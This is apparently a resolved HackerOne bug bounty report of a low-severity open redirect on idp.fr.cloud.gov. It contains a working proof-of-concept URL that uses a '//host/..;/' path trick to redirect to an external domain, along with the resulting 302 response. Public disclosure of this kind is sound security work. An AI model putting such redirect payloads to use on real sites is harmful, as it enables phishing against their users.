[idp.fr.cloud.gov] Open Redirect
Low
Vulnerability Details
**Description:** Open Redirect
**Domain:** idp.fr.cloud.gov
**Steps To Reproduce:**
Open URL:
```
https://idp.fr.cloud.gov//blackfan.ru/..;/css
```
**HTTP Response**
```
HTTP/1.1 302 Found
...
Location: //blackfan.ru/..;/css/
...
```
## Impact
A web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks.
Actions
View on HackerOneReport Stats
- Report ID: 387007
- State: Closed
- Substate: resolved
- Upvotes: 25